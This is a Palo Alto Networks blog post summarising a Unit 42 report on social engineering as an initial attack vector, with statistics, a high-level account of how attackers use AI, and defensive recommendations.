Social Engineering on the Rise — New Unit 42 Report

How Cybercriminals and Nation-State Actors Are Leveraging Sophisticated Social Engineering Techniques to Attack Global Organizations at Scale

Today, Palo Alto Networks Unit 42 released the 2025 Unit 42 Global Incident Response Report: Social Engineering Edition. This report explores the top initial attack vector we observed over the past year – social engineering. During this period, over a third of all Unit 42 Incident Response cases began with a social engineering tactic.

The report analyzes how attackers are exploiting trust to breach organizations, leading to business disruption and financial loss. Insights are derived from Palo Alto Networks telemetry, over 700 incident response case studies, and Unit 42 threat research.

Social Engineering Data Reveals How Human Vulnerabilities Are Exploited

Social engineering is the most common initial access vector observed by Unit 42, with phishing accounting for 65% of social engineering-driven cases. These attacks often target privileged accounts (66%), utilize impersonation of internal personnel (45%) and involve callback or voice-based techniques (23%), which are becoming more sophisticated as attackers leverage AI.

The success of social engineering stems from exploiting human behavior and weak controls, rather than technical vulnerabilities. Our data reveals several key patterns driving the success of these social engineering attacks:

• Business Disruption: Social engineering attacks resulted in data exposure in 60% of cases, 16 percentage points higher than other initial access vectors. Business email compromises (BEC) accounted for roughly half of all social engineering cases, with nearly 60% leading to data exposure.
• Novel Vectors: While phishing leads, 35% of social engineering cases use methods like SEO poisoning, malvertising, smishing and MFA bombing. Attackers are expanding beyond email to other platforms and devices.
• Control Gaps: Ignored alerts (observed in 13% of all social engineering cases), excessive permissions (10%) and lack of MFA (10%) are common weaknesses. Overwhelmed security teams often miss or deprioritize alerts.

AI Fuels a New Era of Social Engineering

AI has the power to reshape social engineering threats. While traditional methods persist, attackers are now using AI tools for speed, realism and scale. Unit 42 has observed three levels of AI-enabled tooling in incidents:

• Automation tools accelerate intrusion steps.
• Generative AI creates human-like content for personalized lures, voice cloning and adaptive interactions.
• Agentic AI autonomously executes multistep tasks, including cross-platform reconnaissance and creating synthetic identities for targeted campaigns.

This indicates a shift where AI components support conventional social engineering, increasing the scale, pace and adaptability of attacks.

Social Engineering Can Be Both Highly Targeted and Highly Scalable

In the report, Unit 42 outlines two top observed social engineering models, both designed to bypass controls by mimicking trusted activity:

High-touch compromise targets specific individuals in real time. Threat actors impersonate staff, exploit help desks and escalate access without deploying malware. This often involves voice lures, live pretexts and stolen identity data, as seen in Muddled Libra and various nation-state activities. These white glove attacks are highly targeted and tailored, employing help desk impersonation, voice spoofing and technical reconnaissance to achieve deep access, broader system control and higher potential for monetization.

At-scale deception includes ClickFix-style campaigns, SEO poisoning, fake browser prompts and blended lures that trigger user-initiated compromise across multiple devices and platforms. Large-scale ClickFix campaigns trick users into executing malware through fraudulent system prompts and CAPTCHA tests. We’ve observed these attacks across healthcare, retail and government sectors, often resulting in widespread credential compromise and operational downtime.

How Organizations Become Low-Hanging Fruit for Social Engineering

Social engineering persists due to overpermissioned access, gaps in behavioral visibility and unverified user trust in human processes. Threat actors exploit identity systems, help desk protocols and fast-track approvals by mimicking routine activity. To counter this, security leaders must shift beyond user awareness, recognizing social engineering as a systemic threat. This requires:

• Implementing behavioral analytics and identity threat detection and response (ITDR) to proactively detect credential misuse.
• Securing identity recovery processes and enforcing conditional access.
• Expanding zero trust principles to encompass users, not just network perimeters.

As technology evolves, attackers exploit human trust and productivity. The nature of trust, verification and defense is changing. This report reflects trends and attacker innovations observed over the past year. By contextualizing these findings, security leaders gain tools to recalibrate defenses, protect business continuity and maintain an edge in an evolving threat environment.

For a deeper dive into these evolving tactics and Unit 42’s comprehensive analysis, download the full report here.

To discover how Unit 42 can empower your organization, visit our website.

The post Social Engineering on the Rise — New Unit 42 Report appeared first on Palo Alto Networks Blog.